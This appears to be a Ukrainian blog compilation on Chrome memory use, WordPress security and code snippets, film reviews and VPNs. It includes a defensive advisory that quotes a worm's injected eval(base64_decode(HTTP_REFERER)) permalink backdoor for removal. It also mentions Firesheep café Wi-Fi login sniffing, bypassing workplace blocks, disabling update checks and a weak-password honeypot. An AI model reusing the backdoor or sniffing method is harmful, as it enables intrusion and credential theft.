Але у мене немає такої проблеми :) Як бачите – відкрито 82 вкладки і при цьому Хром споживає лише 2.7Гб оперативки.

Хочете так само? Без проблем – я вас навчу.
В статті перелічені лише безкоштовні способи, які допоможуть зменшити споживання оперативки браузером.

1. свіжа фіча: Chrome Memory Saver

відносно недавно в хром додали нову фічу Memory Saver яка працює таким чином: Якщо якоюсь вкладкою не користувались деякий час (час невідомий – бо браузер сам вирішує по своєму хитрому алгоритму, по моїм спостереженням 1 година) – хром робить її неактивною і всю оперативну пам’ять, яку ця вкладка споживала, вивільняє для інших задач.

Включається просто. вводите в броузері chrome://settings/performance і включаєте галочку Memory Saver

Також є можливість додати у винятки ті сайти, які ви не хочете, щоб вкладки з ними вивільнялись по таймауту. Наприклад mail.google.com, щоб вкладки з gmail не вигружались з оперативки.

2. Розширення Tab Suspender

Я користуюсь цим розширенням вже 3 роки. Воно робить все те саме, що Memory Saver вбудований в браузер, але появилось набагато раніше і має пару переваг і фіч. І саме через ці фічі, я не юзаю вбудований memory saver.
Фіча перша: Налаштування інтервалу через який час вигружати вкладки. Я поставив 15хв.
Фіча друга: не вигружати з оперативки запінені таби (pinned tabs) – тобто мені не треба морочитись, щоб десь налаштовувати який домен ігнорувати, я просто закріплюю вкладку і знаю, що вона буде доступна завжди.

Фіча третя: Головна фіча як на мене: перед вигрузкою таби з оперативки, це розширення робить скріншот відкритої сторінки і перемикаючись на таку табу я по скріншоту вирішую, чи треба її реактивувати, чи мені достатньо інфи на скріні, або взагалі не треба зараз. Це супер крута фіча, бо вбудований memory saver працює так, що як тільки ти вікриваєш “сплячу вкладку” браузер її завантажує (а ти міг випадково на неї клацнути і не збирався зараз нею користуватись)

Посилання на розширення: https://chromewebstore.google.com/detail/tab-suspender/fiabciakcmgepblmdkmemdbbkilneeeh

3. надмірне споживання оперативки через Adblock

Якщо ви користуєтесь розширенням ablock для блокування реклами на сайтах, но нещодавно Youtube вдався до агресивних методів боротьби з користувачами adblock і через це браузер Chrome починає страшно тормозити, якщо у вас є на якійсь вкладці вікдритий youtube.com

Безкоштовним рішенням цієї проблеми є перехід на інше розширення блокувальника реклами: uBlock Origin – я ним користуюсь вже 5+ років і він мене всім влаштовує.

https://chromewebstore.google.com/detail/ublock-origin/cjpalhdlnbpafiamejdnhcphjbkeiagm

4. аналіз сторінок і розширень, які споживають багато оперативки.

В часи, коли зараз створюються мегаскладні сайти з купою логіки на javascript, такі сайти споживають багато оперативки. Також є розширення, які також працюють на javascript і там також можуть бути проблеми зі споживанням оперативки.
Для цього в google chrome появився “Диспетчер завдань” який показує скільки яка вкладка споживає оперативки і скільки споживає кожне розширення.

Викликати Task Manager можна через комбінацію клавіш Shift+Escape або через меню -> More Tools – Task Manager

Можливо це вас наведе на думку, з яким сайтом є проблеми, або з яким розширенням доведеться розпрощатись, бо воно неефективно використовує оперативну пам’ять.

Наприклад в мене видно, що вкладка з Gutenberg редактором WordPress’у займає 600+Мб, що в ТРИЧІ більше ніж головна сторінка Youtube :) А чому? А тому, що Gutenberg редактор це доооофіга javascript та react коду, який виконується в броузері і споживає оперативну пам’ять для збереження тимчасових даних.

А відсортувавши по колонці CPU – можна побачити яка вкладка чи розширення споживає найбільше процесорних ресурсів.

download-plugin

wp-rollback

core-rollback

file-manager

Увага: плагіни по типу file manager несуть в собі небезпеку тому, що в будь який момент може виявитись вразливість, яка дозволить отримати доступ до файлів зловмисникам. Тому я не рекомендую тримати цей плагін на сайті на постійній основі. Встановіть, зробіть що вам треба і видаліть цей плагін. Не тримайте його постійно на сайті. Тому що, навіть у виключеному стані він може містити вразливість, що дозволить ним скористатись.

Щоб додати букмарклет, просто перетягніть його звідси на панель закладок вашого браузера.
Wp-admin відкриє адмінку в поточному табі, а wp-admin* відкриє адмінку в новому табі. Вибирайте, що кому більше подобається.

WP-ADMIN WP-ADMIN*

Єдиний недолік в тому, що букмарклет не буде працювати коректно, якщо використовувати на WordPress Multisite де сайти розташовуються в підпапках, а не на субдоменах. Ну і якщо сам вордпрес встановлено в підпапку (наприклад в /blog/), а не в корінь сайту, то букмарклет також працювати не буде, але процент таких сайтів дуже малий.

Якщо виникли якісь питання з цього приводу — питайте, не зволікайте :)

Отже: AutosaveOnDeactivate.codaplugin for Coda 2.x
— Automatically saves editor files when they lose keyboard focus.
— Also works with files edited through ftp from Coda2 built-in ftp-manager or from Transmit.

Install in two ways:

1. Extract zip archive and simply double click on file AutosaveOnDeactivate.codaplugin

or

2. In Finder press CMD+Shift+G to access to Go To Folder… dialogue and enter path ~/Library/Application Support/Coda 2/Plug-ins copy file AutosaveOnDeactivate.codaplugin to this folder . Restart Coda 2 if running.

Uninstall:

remove file AutosaveOnDeactivate.codaplugin from folder ~/Library/Application Support/Coda 2/Plug-ins. Restart Coda 2 if running.

Помітити, що сайт взламаний не завжди вдається. Ось у мене був випадок, коли клієнт чисто випадково помітив, що на його сайті внизу були сторонні посилання на сайти з продажу ліків. В інтернеті це називається pharma hack. Але щоб виявити, що ваш сайт заражений цим “вірусом” потрібно його відвідати, але з певними умовами:
— це має бути захід через гугл по пошуковій фразі
— з цієї ip-адреси ви ще жодного разу не заходили на свій сайт
— з цього броузера ви ще жодного разу не заходили на свій сайт (або почистити кукі).
Саме через те, що “лєві” посилання показуються лише при цих умовах, власники сайтів навіть не здогадуються, що їх сайт був зламаний.

Але якщо ви так і не виявили сторонніх посилань на сайті, то не спішіть радіти, ваш сайт може бути взламаний іншим чином і може містити руткіт, або бути учасником бот-мережі. Ці проблеми не є новими, тож в якості протидії їм розробники різних мастей зробили купу плагінів, що покривають ті чи інші аспекти по підвищенню захищеності сайту. Я ж розповім про те, які плагіни обрав сам і рекомендую іншим.

1.Почну з банального – не використовуйте в якості адміністратора логін admin (а також його похідні: adminadmin, administrator, root). Якщо у вас уже є такий логін, то створіть новий акаунт з іншим нестандартним іменем, наприклад: direktor. Для цього нового акаунта дайте права адміністратора, а акаунт admin видаліть, або ж дайте йому роль “підписник”. Ну і звісно, що потрібно обирати складні паролі – з цифрами, буквами в верхньому регістрі і достатньо довгим (мінімум 8 символів).

2.Встановіть плагін Limit Login Attempts. По замовчуванню, він буде блокувати всіх, хто 5 разів неправильно введе логін-пароль на 20 хвилин. Якщо з цього айпі будуть нові спроби підбору паролю, то плагін заблокує доступ вже на 24 години. Це значно покращить захист вашого сайту. Бо зараз існують цілі мережі ботів, що тільки тим і займаються, що підбирають паролі до адмінки. Цілком можливо, що саме в цю секунду на ваш сайт здійснюється масована атака ботів, що підбирають пароль.

Окрім цього, я використовую такий хитрий хід: для логіну admin, даю роль “підписник” і ставлю йому простий пароль: 123456. Боти дуже швидко підбирають пароль, входять в адмінку, але нічого більше зробити не можуть ;)

В одного мого клієнта була ситуація, що його сайт зламав бот якраз через слабкий пароль в адмінку і цей же бот модифікував файли, щоб показувати рекламу для всіх відвідувачів з мобільних телефонів. Я точно впевнений, що хакер, який володіє цим ботом, навіть не заходив на сайт, бо то на тому ж хостингу в сусідній папці був іще один сайт, який не зазнав жодних змін. Тобто, як бачите, зараз весь процес взлому сайту повністю автоматизований і не потребує людського втручання.

3. Встановіть плагін Better WP Security. Це дуже потужний плагін для продвинутих юзерів. Деякий функціонал в ньому потрібно включати з обережністю, бо він може вплинути на інші плагіни, які заглючать від цього. Під такими галочками, що включать конфліктний функціонал, є попередження, так що будьте уважні.
По суті він може замінити і плагін Limit Login Attempts, бо також має функцію блокування від підбору пароля. 

Я налаштовую його так: вмикаю 404 detection та File Change Detection та вмикаю надсилання емейлу про щоденні логи по цим пунктам. В Directory Check List вніс папку wp-content/cache, щоб зміни в ній не фіксувались. Більше я нічого не використовую з його функціоналу. І ще нюанс: листи з цього плагіну гугл вперто відправляє спам, тож майте це на увазі.

Ну і останній пункт — не забувайте робити бекапи. Якщо сайт взламають, а у вас буде свіжий бекап, то можна швидко повернути сайт до попереднього стану і заодно, порівнюючи файли з зараженого і незараженого бекапу, можна вияснити, яким чином хакер проникнув всередину. Зараз існує ряд різноманітних плагінів для вордпресу, що можуть робити бекапи і на емейли і на dropbox, і на інші онлайн-сервіси. Я ж користуюсь плагіном BackUpWordPress в якому можна окремо запланувати розклад бекапу для бази данних та окремо для файлів. А потім через фтп зливаю їх час від часу собі на копм.

На цьому все, якщо є якісь питання чи доповнення, пишіть.
Бажаю щоб ваші сайти ніколи не зламали.

Кожен з нас фанатіє від стрічок певного режисера: Спілберга, Кустуріци, Тіма Бертона, Хічкока чи когось іще. Але ніхто з нас не знає, як виглядає повсякденне життя цих людей, чим вони живуть, які в них турботи і таке інше. І хоча фільм є художнім, а не документальним, проте я думаю, що його ціллю було показати саме характер, поведінку та стиль життя маестро максимально точно та достовірно.

Попереджую — не дивіться трейлер до фільму, інакше будете знати наперед майже всі ключові моменти і події.
Головна сюжетна лінія розгортається навколо зйомок фільму «Психо». Це зараз він вважається одним з навидатнішим фільмом тієї епохи, але в момент його створення ніхто не вірив, що цей фільм сподобається глядачеві. Навіть його дружина Альма Ревіль не вірила в успіх цієї стрічки і дуже скептично віднеслась до ідеї … Ай, якщо продовжу далі розказувати, то це буде спойлер. Давайте, я краще розповім про самі кадри.
Мені дуже сподобалась атмосфера фільму – 60-ті роки, часи розкішних американських кабріолетів, пишних зачісок та хіппі (хоча останнім в фільмі не найшлось місця:)) Дуже цікаво було на це дивитись — все дуже автентично, я не помітив жодного кіноляпу щодо історичної недостовірності. Операторська робота на висоті, сидиш в кінотеатрі і насолоджуєшся кадрами. Часто режисери вставляють в фільм кадри, що не є ключовими, але є цікавими і незвичними, в цьому фільмі таких кадрів достатньо, наприклад кадр, де був велосипед з кошиком наповнений величезними ножами, призначених для зйомок «Психо».
Після перегляду цього фільму довго думав над тим, наскільки була складною робота монтажерів в ті часи. Це вам не в Едіусі кадри по таймлайну рухати, тоді вони під лупою розглядали кадри, вибирали місце де різати і клеїли докупи.
А майстри гриму настільки постарались з перевтіленням актора Ентоні Хопкінса в Альфреда Хічкока, що їхню працю номінували на премію оскар в категорії «За найкращий грим».

В цілому фільм хороший та вартий перегляду, тож раджу запланувати похід в «Планета Кіно» поки він ще в прокаті.

Раджу також почитати відгук на цей фільм від Оленки Совун: «Хічкок» — на мою думку, їй вдалось найкраще розповісти про шарм цього фільму.

А от сам фільм мені сподобався! Насамперед тим, що в ньому показується Україна такою, якою вона є, без прикрас. Головний герой живе в старій професорській трьохкімнатній квартирі, яка у стані перманентного ремонту. В нас півукраїни живе в таких умовах – де лише двері стоять нові-броньовані, а відкриєш двері і побачиш все те, що було в квартирах зразка восьмидесятих: старі меблі, старі шафи з дсп, умивальник емальований і т.д. А чого варті кадри з місця роботи головного героя Толіка — психіатричний диспансер, організований в якійсь дореволюційній будівлі, що з тих пір не бачила ні реставрації, ані бодай якогось ремонту.

Сам же Толік є лікарем-психіатром, який ходить на роботу ну точно не заради зарплати. І його дружина, яка є актрисою, працює в театрі юного глядача, також не може відкласти зі своєї зарплати на ремонт, чи бодай на пристойну машину. Тому, коли Толю звільняють з роботи, йому приходиться “крутитися”, пробувати себе в інших ролях на інших роботах. Доходить навіть до безглуздого – торгувати курячим послідом.
В фільмі мені дуже сподобалась сцена з роздумами на тему дитячих казок: що ментальність людей формується на базі почутих та прочитаних в дитинстві казок, а в різних країнах, акценти були різними: в Англії персонажі казок були дуже роботящими та завзятими і саме це помагало стати їм успішними, у французьких казках герої відзначались розумом та хитрістю, а в українських — герой лежав на печі і чекав дива.

Операторська робота в цьому фільмі теж на висоті – кадри з вороном та крупні плани обличь влучно вжиті, багато статичних кадрів, через які складається враження, що це не фільм, а вистава в театрі. Також кльова сцена очікування співбесіди, та самої співбесіди на роботу копірайтера. Знято на аналогову плівку, що дає “тепле, лампове відчуття”, а згадайте любий сучасний російський серіал знятий на “цифру” – там від однієї картинки блювати хочеться.
От про звуковий ряд не можу нічого сказати – я його щось зовсім не помітив, окрім сцени подій в дискотеці. Можливо на повторному перегляді зверну увагу, бо розказав про цей фільм своїй дівчині і вона також захотіла на нього сходити в кінотеатр.
Так що, рекомендую цей фільм до перегляду. Окрім цього, варто ж підтримати українського виробника, бо хочеться, щоб українських фільмів було більше.

[youtube w=560 h=349]http://www.youtube.com/watch?v=l7vFBqmaThg#![/youtube]

p.s. А з заголовком я таки переборщив, але то таке.
       А ще дякую за запрошення Романові Голубовському. 

    Місяць тому, мій акаунт на сайті Вконтакті заблокували через розсилання спаму. Я був в шоці, бо не міг збагнути, як можна було зламати мій згенерований пароль, який я навіть сам не пам’ятаю? Про те, що це вірус вкрав теж не може бути мови, адже я користуюсь MacOS. 
Після того як я відновив доступ до vk.com, в логах побачив, що моїм акаунтом дійсно користувались, причому з Японії та Індії 0 4-ій годині ранку. Проаналізувавши всі можливі варіанти, я дійшов висновку, що єдиним способом, яким могли дізнатись мої дані — було перехоплення трафіку wi-fi в кафешках. 

Виявляється, для цього не потрібно бути навороченим хакером. Береш firefox, скачуєш плагін firesheep і під’єднуєшся до любої wi-fi точки в місті, де є багато користувачів. За годину часу можна зібрати чимало логінів-паролів тих людей, які користуються цією wi-fi точкою.
Єдиний вихід з цієї ситуації – використання VPN, що завдяки шифруванню робить неможливим перехоплення трафіку.

VPN як спосіб захисту своїх даних.

Проаналізувавши декілька vpn-провайдерів, я вибрав VPN від сайту hideme.ru.
До слова, я вже колись писав про цей сайт, коли розказував про те, як отримати доступ до сайту Вконтакті, коли його заблокували адміни на робочому місці. 
Так от, в hideme.ru можна вибрати один з 40-ка серверів vpn з великими пропускними каналами до 10Гбіт/c, на яких використовується 2048-бітний ключ шифрування. Географічно, ці сервери знаходяться в 28-ми різних країнах (нижче я розповім чому це важливо і як це використати з користю для себе).

Ви можете безкоштовно користуватись цим сервісом впродовж одного дня, а надалі – передплатити. З того, що вони пропонують, найвигідніший варіант передплати – це оплатити відразу на рік часу за 260 грн (тоді виходить один день за 0.71 грн)

VPN, як спосіб обійти заборони на користування деякими сайтами

Ось тепер поясню, чим класно, що можна вибрати VPN в якійсь конкретній країні. Я думаю, що у вас також були ситуації, коли вам кидали лінку на відео в ютубі, а ви його не могли переглянути, бо воно заблоковане для перегляду в вашій країні. Так от за допомогою VPN ви можете обійти цю заборону, вибравши сервер в тій країні, де це відео можна переглядати. 

• Також можна переглядати відео та фільми на сайті ivi.ru,  використавши vpn з російського серверу.
• Якщо ви подорожуєте закордоном, то вибравши український vpn сервер, можна дивитись фільми на fs.ua та слухати яндекс.музику.
• А фанати перегляду серіалів в оригіналі зрадіють можливості дивитись їх на сайті fox.com завдяки vpn з американською ip-адресою.

Ось іще кілька сайтів, для яких потрібен vpn, щоб повноцінно ними користуватись: spotify.com, hulu.com, last.fm.
Я, наприклад, налаштував vpn на айподі, щоб слухати онлайн-радіо Spotify.

VPN, як спосіб отримати доступ до сайту Вконтакті чи Однокласники на робочому місці.

Якщо у вас на робочому місці заблокований доступ до соц.мереж + заблокована можливість встановлювати софт та драйвери то є два способи як це обійти. 
1. Використовувати, як і раніше, анонімайзер, або проксі-сервер. 
2. Або спробувати задіяти vpn через PPTP за інструкцією, яку я знайшов  на youtube: http://www.youtube.com/watch?v=XZGrDTiNtIo . Бо інструкція, що на сайті hideme.ru підходить тільки в тому випадку, якщо у вас є права адміністратора на компі.

Другий спосіб я провіряв лише на windows XP і не знаю чи спрацює він і в windows 7 в умовах обмеженого облікового запису користувача. Хто матиме нагоду перевірити це, відпишіть в коментарях про результати.

Брендована адмінка.

Задача: Зробити вивід власного логотипу замість логотипу WordPress на сторінці логіну в адмінку, та в заголовку адмінки.

Для виводу логотипу на сторінці логіну зкопіюйте цей код в файл functions.php вашої теми:

function my_custom_login_logo() {
    echo '<style type="text/css">
        html {background-color:#001721;}
        h1 a { background-image:url('.get_bloginfo('template_directory').'/images/logo.png) !important; } </style>';
}

add_action('login_head', 'my_custom_login_logo');

Цим самим ви замінюєте вивід логотипа на власний logo.png , що знаходиться в папці images вашої поточної теми. Як бачите, зміни стосуються лише css’у і ви можете туди додати ще свої стилі для інших елементів (я, наприклад, ще люблю поміняти фон під фірмові кольори та тінь додати яскравого кольору, щоб було як ефект м’ягкої підсвітки)

Ось приклади таких сторінок логіну:

А ось код, що змінить логотип в заголовку адмінки:

 function my_custom_logo() {
    echo '<style type="text/css">#header-logo { background-image: url('.get_bloginfo('template_directory').'/img/clogo.png) !important; }</style> ';
    }
add_action('admin_head', 'my_custom_logo');

Тут я теж люблю додавати стилі, щоб забрати заголовок сайту і зробити лого клікабельним. Приклад зміненої шапки адмінки

Заміна тексту в футері адмінки

Ще одна фішка, добавляє в футер адмінки дані про використану оперативку на хостингу і кількість запитів до MySQL та швидкість генерації сторінки:

function usage($value) {
	if ($value == 1)
		echo '<div class="usage">';
	
	printf(('%d / %s'), get_num_queries(), timer_stop(0, 3));
	echo ' / ' . round(memory_get_usage()/1024/1024, 2) . ' мб';
	
	if ($value == 1)
		echo '</div>';
}
add_action('admin_footer_text', 'usage');

Звичайно ви можете замінити це і в команді echo виводити якусь іншу інформацію.

Видалення непотрібних блоків в “Майстерні”

Наступний хак видаляє непотрібні блоки з головної сторінки адмінки, так званої “Майстерні” :

function custom_dashboard() {
	global $wp_meta_boxes;

	//unset($wp_meta_boxes['dashboard']['normal']['core']['dashboard_right_now']);
	unset($wp_meta_boxes['dashboard']['normal']['core']['dashboard_recent_comments']);
	unset($wp_meta_boxes['dashboard']['normal']['core']['dashboard_incoming_links']);
	unset($wp_meta_boxes['dashboard']['normal']['core']['dashboard_plugins']);
	unset($wp_meta_boxes['dashboard']['side']['core']['dashboard_quick_press']);
	unset($wp_meta_boxes['dashboard']['side']['core']['dashboard_recent_drafts']);
	unset($wp_meta_boxes['dashboard']['side']['core']['dashboard_primary']);
	unset($wp_meta_boxes['dashboard']['side']['core']['dashboard_secondary']);
}
add_action('wp_dashboard_setup', 'custom_dashboard');

В кожному рядку видаляється по одному блоку з “Майстерні”:

dashboard_recent_comments — свіжі коментарі
dashboard_incoming_links — вхідні посилання
dashboard_plugins — rss новин плагіни
dashboard_quick_press — швидка публікація
dashboard_recent_drafts — нещодавні чернетки
dashboard_primary — rss новини WordPress
dashboard_secondary — rss інші новини WordPress

Я зазвичай видаляю все окрім основного блоку “Прямо зараз”. На сайтах з включеною можливістю коментування ще залишаю блок “Свіжі коментарі”. Ви можете так само вибірково видалити непотрібні елементи, видаливши рядок, що відповідає йому.

Видалення непотрібних блоків в head секції

Наступний хак я використовую на сайтах-візитках де не потрібно rss і перелінковки між постами, так як основний контент йде на сторінках. Він видаляє купу непотрібних рядків в секції head коду html.

remove_action('wp_head', 'feed_links', 2); //rss
remove_action('wp_head', 'feed_links_extra', 3); //atom 
remove_action('wp_head', 'index_rel_link'); // тут і нижче лінки для перелінковки сторінок
remove_action('wp_head', 'adjacent_posts_rel_link_wp_head', 10, 0);
remove_action('wp_head', 'next_post_rel_link', 10, 0);
remove_action('wp_head', 'parent_post_rel_link', 10, 0);
remove_action('wp_head', 'rel_canonical');
remove_action('wp_head', 'start_post_rel_link', 10, 0);
remove_action('wp_head', 'rsd_link'); // лінка для трекбеків
remove_action('wp_head', 'wlwmanifest_link'); // лінка для редактора Windows Live Writer
remove_action('wp_head', 'wp_generator'); // тег, в якому пише версія вордпресу
remove_action( 'init', 'wp_version_check' ); // видалення провірки оновлень
remove_action( 'load-plugins.php', 'wp_update_plugins' ); // не провіряти оновлення плагінів
remove_action( 'load-update.php', 'wp_update_plugins' );
remove_action( 'admin_init', '_maybe_update_plugins' );
remove_action( 'wp_update_plugins', 'wp_update_plugins' );
remove_action( 'admin_init', '_maybe_update_themes' ); // не провіряти оновлення тем
remove_action( 'wp_update_themes', 'wp_update_themes' );

Використовувати це чи ні на вашому блозі це вже на ваш розсуд.

Заборона вставляти лінки в коментарях

Якщо ви не хочете, щоб лінки залишені коментаторами автоматично конвертувались в клікабельні посилання, то вставте цей код в functions.php:

remove_filter('comment_text', 'make_clickable', 9)

Показувати повідомлення про нову версію вордпреса лише для адмінів

< ?php
function stop_wpupdate() {
if ( current_user_can('manage_options') ) {
return;
} else {
remove_action( 'admin_notices', 'update_nag', 3 );
}
}
add_action( 'admin_notices', 'stop_wpupdate', 1 );
?>

Кнопки видалення коментарів на сторінці посту

Попередня фішка з показом повідомлень оновлень вордпресу для адмінів використовує функцію current_user_can яка визначає, чи має поточний юзер певні права. На основі цього я зробив фішку, що показує лінки на видалення коментарів і встановлення помітки “спам” для адміністраторів на сторінці посту. Цей код вставляєм в functions.php:

function delete_comment_link($id) {
  if (current_user_can('edit_post')) {
    echo '| <a href="'.admin_url("comment.php?action=cdc&amp;c=$id").'">del</a> ';
    echo '| <a href="'.admin_url("comment.php?action=cdc&amp;dt=spam&amp;c=$id").'">spam</a>';
  }
}

А саму функцію delete_comment_link вставляєм в файл comments.php вашої теми після функції edit_comment_link :

<?php edit_comment_link('Edit','',' '); delete_comment_link(get_comment_ID());?>

Анонс постів з певної рубрики в сайдбарі

В мене було завдання вивести в сайдбарі по першому реченню із трьох постів в рубриці “Проекти”. Я використав такий код в файлі sidebar.php :

     <div class="sidenews">
     <?php $my_query = new WP_Query('category_name=projects&showposts=3');
     while ($my_query->have_posts()) : $my_query->the_post(); ?>
     <h3><a href="<?php the_permalink() ?>" title="<?php the_title(); ?>"><?php the_title(); ?></a></h3>
     <?php preg_match( '/^.{150,}?[.?!]+(?=\s|$)/ ', get_the_content(), $A );
                               echo '<p>'.$A[ 0 ].'</p>'; ?>   
     <?php endwhile; ?>
     <p><a href="<?php echo get_category_link('4') ?>">Все проекты</a></p>
     </div>

Використаний регулярний вираз шукає перше речення, але якщо це речення менше 150 символів, то вона захопить і наступні речення. Таким чином я уникнув помилки, коли в першому реченні зустрічається чиєсь прізвище чи адрес сайту.

Вставка кнопки твітера Tweet

Щоб появилась кнопка з підрахуноком кількості ретвітів потрібно вставити ось такий код в файл single.php вашої теми (наприклад після коду the_title(); ):

<a href="http://twitter.com/share" class="twitter-share-button" data-text="<?php the_title(); ?>" data-url="<?php the_permalink(); ?>" data-count="horizontal">Tweet</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>

Це виведе горизонтальну кнопку з кількістю ретвітів з правої сторони. А щоб кількість ретвітів показувалось над кнопкою, то замініть data-count="horizontal" на data-count="vertical"

Ну і наостанок маленький хак: щоб в редакторі постів зробити перенос рядка br потрібно натискати Shift+Enter

Вчора пройшла хвиля атаки і взлому блогів на вордпресі. А якщо погуглити, то можемо зробити висновок, що пострадали тисячі сайтів.

Так в чому полягала суть? А суть в тому, що дехто запустив в мережу бота, що виявляв старі версії WordPress (до версії 2.8.4) і користуючись старим багом, реєстрував юзера і використовуючи певних шаблон посилання отримував адмінські права, потім під цим юзером міняв шаблон ЧПУ в налаштуваннях, а далі модифікував (заражав) код теми, щоб підсовувати відвідувачам вірус чи ще якусь фігню.

І хоч мій блог досі працює на одній із старих версій вордпресу, але його ця напасть минувала. А все тому, що бот визначав версію блога по мета-тегу, що автоматом прописує вордпрес в усі теми, а я цей тег давним давно в себе видалив. Про те, як видалити цей тег, я писав раніше в статті: корисні функції в functions.php — раджу і вам таке зробити ;)

А тим, хто вже пострадав від цього віруса, черв’яка, бота (називайте як хочете) потрібно зробити:

• В налаштуваннях ЧПУ, поміняти з
  /%postname%/%&({${evаl(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
  на
  /%postname%/
  (у вас може відрізнятись структура, по аналогії я думаю зрозумієте :))
• Найдіть останнього зареєстрованого користувача на вашому сайті і знищіть його! Швидше за все, це буде MikeWink E-mail: bugbeemershonyhe@gmail.com
• Оновити WordPress до версії 2.8.4

Але якщо немає бажання оновлюватись і хочете покращити безпеку свого блогу, ви можете заборонити всім доступ до адмінки окрім себе, за допомогою невеличкої правки .htaccess
Звичайно, було б добре коли у вас постійний статичний IP-адрес, тоді тільки б його і вказали. А якщо у вас динамічна айпішка, то можете вказати діапазон
Для цього зробіть наступне:

• зайдіть на сайт myip.ru аби дізнатись ваш IP адрес (способів дізнатись зовнішній айпі дуже багато, я привів самий простий для блондинок). Ви наприклад побачили: ВАШ IP-АДРЕС: 91.134.98.173
• створіть файл .htaccess в папці wp-admin вашого блогу і пропишіть там наступне:

  AuthUserFile /dev/null
  AuthGroupFile /dev/null
  AuthName "Access Control"
  AuthType Basic
  
  order deny,allow
  deny from all
  allow from 91.134.98.173
  

  а якщо у вас динамічна айпішка, то краще напишіть так:

  
  AuthUserFile /dev/null
  AuthGroupFile /dev/null
  AuthName "Access Control"
  AuthType Basic
  
  order deny,allow
  deny from all
  allow from 91.134.0.0/255.255.0.0
  

  Детальніше про синтаксис директив Allow, Deny для Apache htaccess читайте тут.

• Збережіть файл. Все.

Тепер, до адмінки вашого блогу зможете потрапити лише ви з вашого комп’ютера. А якщо ви будете в дорозі, або в інтернет-кафе і захочете, зайти в адмінку блога, а вас не буде пускати (швидше за все, ви побачите помилку 404), бо айпішка не входить у вказаний діапазон, то тоді вам потрібно буде зайти по фтп на хостинг і тимчасово переіменувати файл .htaccess. І тут мабудь хтось з вас подумав: «Це що, я ще й маю пароль на фтп пам’ятати для таких випадків?» — Ну а що ви хотіли, прийдеться жертувати зручністю заради безпеки. Це як у відомій цитаті: «Так вам шашечки или ехать?!»

Бережіть себе і бережіть свій блог.

[tab:По русски]

Вчера прошла волна атаки и взлома блогов на вордпрессе. И если погуглить, то можно судить, что пострадали тысячи блогов.

Но как все это произошло? А случилось вот что: кое-кто запустил в сеть бота, который находил старые версии WordPress (до версии 2.8.4) и пользуясь старым багом, регистрировал юзера и используя определенную ссылку получал права админа на блоге, потом под этим юзером менял шаблон ЧПУ в настройках, а далее модифицировал (заражал) код темы.

И хотя мой блог до сих пор работает на одной из старых версий вордпресса, но не пострадал. А все потому, что бот определял версию блога по мета-тегу, который автоматически прописывает вордпресс во все темы, а я этот тег давным-давно у себя удалил. Про то, как удалить этот тег, я писал ранее в статье: корисні функції в functions.php — советую и вам так же сделать ;)

А тем, кто уже пострадал от этого вируса, червья, бота (называйте как хотите) нужно:

• В настройках ЧПУ, поменять с
  /%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
  на
  /%postname%/
  (у вас может отличаться структура, по аналогии думаю поймете, что где поменять :))
• Найдите последнего зарегистрированного пользователя на вашем сайте и уничтожьте его! Скорее всего , это будет MikeWink E-mail: bugbeemershonyhe@gmail.com
• Обновите WordPress до версии 2.8.4

А если нет желания обновляться и хотите улучшить безопасность своего блога, то вы можете запретить всем доступ к админке, кроме себя, с помощю небольшой правки .htaccess
Конечно, было бы лучше, если у вас постоянный статический IP-адрес, тогда тольки бы его и указывали. Но в случае динамического айпи-адреса можете указывать диапазон адресов.
Для это сделайте следующее:

• зайдите на сайт myip.ru чтобы узнать ваш IP адрес. К примеру: ВАШ IP-АДРЕС: 91.134.98.173
• создайте файл .htaccess в папке wp-admin вашего блога и пропишите там следующее:

  AuthUserFile /dev/null
  AuthGroupFile /dev/null
  AuthName "Access Control"
  AuthType Basic
  
  order deny,allow
  deny from all
  allow from 91.134.98.173
  

  в случае динамического IP-адреса, напишите так:

  
  AuthUserFile /dev/null
  AuthGroupFile /dev/null
  AuthName "Access Control"
  AuthType Basic
  
  order deny,allow
  deny from all
  allow from 91.134.0.0/255.255.0.0
  

  Подробнее о синтаксисе директив Allow, Deny для Apache htaccess читайте здесь.

• Сохраните файл. Все.

Теперь, к админке вашего блога зайти можете только вы с вашого компьютера. Ну а если вы будете в дороге, или в интернет-кафе и захотите, зайти в админку блога, а вас не будет пускать (скорей всего, вы увидите сообщение об ошибке 404), потому что IP-адрес не входит в указанный диапазон, то тогда вам нужно будет зайти по фтп на хостинг и временно переименовать файл .htaccess. И тут, наверное, кто-то из вас подумал: «Это я еще должен и пароль на фтп помнить для таких случаев?» — Ну а что вы хотели, приходится жертвовать удобством ради безопасности. Помните цитату: «Так вам шашечки или ехать?!»

Берегите себя и берегите свой блог.

[tab:END]